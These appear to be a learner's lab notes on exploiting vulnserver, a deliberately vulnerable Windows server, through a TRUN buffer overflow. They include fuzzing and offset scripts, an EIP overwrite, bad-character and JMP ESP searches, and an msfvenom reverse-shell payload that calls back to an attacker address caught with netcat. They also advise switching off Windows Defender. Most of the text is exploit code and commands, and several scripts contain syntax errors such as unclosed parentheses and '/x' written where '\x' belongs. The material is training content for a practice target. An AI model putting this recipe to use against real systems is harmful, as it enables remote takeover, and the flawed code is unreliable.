Programs needed:
– Windows
– Immunity Debugger
The Stack:
Extended Stack Pointer (ESP)
Buffer Space
Extended Base Pointer (EBP)
Extended Instruction Pointer (EIP)
Return Address
The Process:
1 Spiking
2 Fuzzing
3 Finding the Offset
4 Overwriting the EIP
5 Finding Bad Characters
6 Finding the Right Module
7 Generating Shellcode
8 Gain Root Access
To Dos:
On Windows
– Turn off Real-time protection
– This is because of Windows Defender
– Turn off Virus & threat protection
– Download ‘vulnserver.exe’ onto Windows
– found on GitHub, google vulnserver
– Download and install ‘Immunity Debugger’
– from Immunity Inc.
– can run a program through the debugger
– after triggering exploit, can see results
– Don’t need to give them real info to download
– Run vulnserver as admin
– Run Immunity as admin
Immunity:
– File –> Attach
– look for vulnserver, attach
– Hit the play button on top
Kali:
– Connect to vulnserver
$ nc -nv <vulnserver_IP> 9999 # 9999=port
$ HELP
– see the commands that are possible
$ STATS is used to spike
# this is an example usage
$ ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
# this command is used to send the .spk file
$ TRUN is the most important part of Spiking
– same as the STATS, but change the file to trun.spk
– it throws a bunch of characters to see if the program crashes
– it should show the usage
1. SPIKING:
stats.spk / trun.spk
– needed to initiate the spike
– put these three lines in a text called stat.spk
s_readline();
s_string(“STATS “);
s_string_variable(“0”);
– send this to the vulnserver
$ generic_send_tcp <target IP> 9999 stats.spk 0 0
$ generic_send_tcp <target IP> 9999 trun.spk 0 0
– the trun.spk made the vulnserver crash
– we hit a vialation
– look at the registers to see what happened
– EBP shows 41414141, which is all ‘A’s
– we need to get the EIP with 41414141
– EIP will give us control
2. FUZZING:
We know that trun is vulnerable… so we’ll use that one
As admin – reboot the vulnserver, and immunity… then reattach
create a python script for fuzzing
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 1——————————–
#!/usr/bin/python
import sys, socket
from time import sleep
buffer = “A” * 100
while True:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect ((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + buffer))
s.close()
sleep(1)
buffer = buffer + “A”*100
except:
print “Fuzzing crashed at %s bytes” % str(len(buffer))
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
chmod +x script1.py
Kali:
$ ./script1.py
– watch Immunity for the crash, then ^c the script
– need to know approx where we crashed (around 3000 bytes)
– need to find where we get to the EIP
FINDING THE OFFSET:
– looking for where we overwrite the EIP
– There is a tool by metaspoloit called ‘Pattern Create’
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
– l is for length because we found around 2700 bytes is where vulnserver crashed
– run the program, and copy the output
– modify the script [see below] by pasting the value to offset as a variable
– change variable buffer to offset and assign it the output
– rename script to script2.py
– this should give us a value of the EIP
chmod +x script2.py
Kali:
$ ./script2.py
– output shows us getting to the EBP, but not EIP
– use metasploit to send the pattern_offset.rb, but with a ‘-q 386F4337’ at the end
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337
– it should find “Exact offset match at 2003”
– at 2003 bytes, we should be able to control the EIP
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 2——————————–
#!/usr/bin/python
import sys, socket
offset = “<insert copied output of patern_create.rb>”
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + offset
s.close()
except:
print “Error Connecting to Server”
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
OVERWRITE THE EIP:
– the EIP is 4 bytes, so we want to overwrite those after the 2003 bytes before it
– modify script2.py
– delete the offset variable
– write shellcode as the variable
– shellcode = “A” * 2003 + “B” * 4
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 3——————————–
#!/usr/bin/python
import sys, socket
shellcode = “A” * 2003 + “B” * 4
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + shellcode
s.close()
except:
print “Error Connecting to Server”
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
– chmod +x for script3.py
– it should break the program with an access vialation
Kali:
$ ./script3.py
– EBP came through as 41414141
– EIP is now 42424242
– this means we control the EIP
FINDING BAD CHARACTERS:
– We need to know what characters are good for shell code and which are bad
– we can run all the hex characters through the program and see what acts up
Google
– look for ‘bad chars’
– Bulb Security comes up
– can copy/paste the bad chars that it gives
– there is a null-byte at the beginning ‘x00’ that can be deleted
– change your script now to add bad chars as a variable
– these are every hex characters that we can run through the program
– parse all through the program, and see what looks funny
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————–SCRIPT 4——————————-
#!/usr/bin/python
import sys, socket
badchars = (“<paste from bulbsecurity>”)
shellcode = “A” * 2003 + “B” * 4 + badchars
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + shellcode
s.close()
except:
print “Error Connecting to Server”
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
– chmod +x for script4.py
– fire off the program
– should break the program
– we are interested in the hex dump now
– at the ESP, right click on the hex, and select ‘follow in dump’
– the last thing we sent is FF, so we’re looking for the bad char
– if there was a bad char, it would be out of place… 10, 11, 12, 14
– 13 would be the bad character
– if we see something instead of the normal character, that’s the indicator
– write each one of these bad characters down
– these will be used to gain root
FINDING THE RIGHT MODULE:
– we are looking for a .dll (or other files) that has no protections
Google
– mona module (find mona.py)
– This PC / Local Disk / Program Files x86 / Immmunity Inc / Immunity Debugger / PyCommands
– Paste it to this location
– now we can use the bottom white bar in Immunity to type commands
– type: !mona modules
– it will show a green blob of greatness
– we are looking for the protection settings (example: false, false, false, true, false)
– looking for all falses, and attached to the vulnserver, essfunk.dll stands out…
– we are about to find the op code equivilant of a jump
Kali:
$ locate nasm_shell
– use the result, and copy/paste to command line
$ nasm > JMP ESP
… FFE4 …
– go back to immunity
– on bottom white area, type: mona find -s “xff/xe4” -m essfunc.dll
– we are looking for return addresses
– write down the address
– Kali – exit out of nasm
– open the python script… we don’t need the bad characters anymore
– now we’ll write in the return address
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————SCRIPT 5———————————
#!/usr/bin/python
import sys, socket
# 625011af #this is the return address
shellcode = “A” * 2003 + /xaf/x11/x50/x62 #this is in reverse of the return address
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + shellcode
s.close()
except:
print “Error Connecting to Server”
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
– this script will give us a jump point
– open immunity again…
– click on the blue arrow next to the play button at the top
– enter the jump code
– it should find the ESP with that code, hit F2 to set a break point
– this will overflow the buffer, but will pause the program for further instruction
– hit play
Kali:
– chmod +x for script5.py
$ ./script5.py
– it shows a break point at EIP
– now generate shell code, and execute it
GENERATING SHELL CODE / GETTING ROOT:
– use msfvenom to generate shell code
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.20.131 LPORT=4444 EXITFUNC=thread -f c -a x86 -b “\x00”
– p is payload
– we’re providing our info because it’s a reverse shell
– EXITFUNC just makes the exploit more stable
– f is file type, for c code
– a is the type architecture
– b is for bad characters (this is where we would put them in)
– copy/paste the results into the python script that we’ve been using
– take note of payload size because of limited space
——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————SCRIPT 6———————————
#!/usr/bin/python
import sys, socket
overflow = (<copy/paste output of msfvenom>)
shellcode = “A” * 2003 + “/xaf/x11/x50/x62” + “\x90” * 32 + overflow #\x90 is the nops
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
s.send((‘TRUN /.:/’ + shellcode
s.close()
except:
print “Error Connecting to Server”
sys.exit()
———— BUFFER OVERFLOW PYTHON SCRIPT ————–
– the shellcode will submit 2003 bytes to get to the EIP, then it will jump to the set of instructions we provide
– overflow is the extra instructions
– we will need some padding called ‘nops’ (\x90) known as a no-operation
– it’s pad space between jump command and overflow
Kali:
– set up netcat
$ nc -nvlp 4444
– run vulnserver again as admin
– run the script
– go to netcat, and now there is a shell!